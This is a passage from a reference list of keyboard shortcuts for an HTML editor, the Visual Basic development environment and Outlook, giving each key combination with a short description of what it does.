Right align the text
Ctrl + E
Center the text
Ctrl + /
Display HTML tags
Ctrl + S
Save document
Ctrl + Tab
Switch between open web pages
Ctrl + Insert
Enter Line break
Ctrl + Enter
Move cursor above or below a table
Ctrl + Shift + B
Preview in web browser window
Ctrl + Shift + <
Decrease font size
Ctrl + Shift + >
Increase font size
Visual Basic Shortcut Keys
Shortcut Keys
Description
F2
Brings up the 'Object Browser' window
F3/F4/F6/F11
Brings up the 'Properties Window' for the current form/control
F5
Executes the current project
Ctrl + F5
First checks for syntax errors and then executes the project
F7
Opens the code window for the current control
F8
Executes the project in 'Step mode'. Keep pressing F8 to execute the next statement; Press F5 to come out of step mode
F9
Inserts break point at the current line in the code window. Press F9 again to toggle the break point
Ctrl + G
Brings up the 'Immediate window', which is useful for debugging purposes
Ctrl + Spacebar
While writing code, this combination helps you see the available options/methods/properties based on what you are typing
Ctrl + J
Same as above...
Shift + F2
Place the cursor over any function call and press Shift + F2 to see the declaration of that function
Ctrl + F
Brings up the find dialog box
Ctrl + H
Brings up the replace dialog box
Shift + F3
Finds the previous occurrence of a string
Ctrl + Shift + F9
Clears all break points
Ctrl + Delete
Deletes to the end of the word
Crtl + Y
Deletes the current line of code
Ctrl + Z
Undoes the last change in the code window
Ctrl + Up/Down arrows
Helps you move between procedures/functions in the code window


Outlook Shortcut Keys
Shortcut Keys
Description
Alt + S
Sends the current mail
Ctrl + Enter
Sends the current mail
Ctrl + K
Resolves the email addresses from the address book
Alt + K
Resolves the email addresses from the address book
F7
Starts spell check
Ctrl + D
Deletes the current mail
Shift + Delete
Permanently deletes the current mail
Ctrl + Z
Undoes the last change
Ctrl + Y
Redoes the last change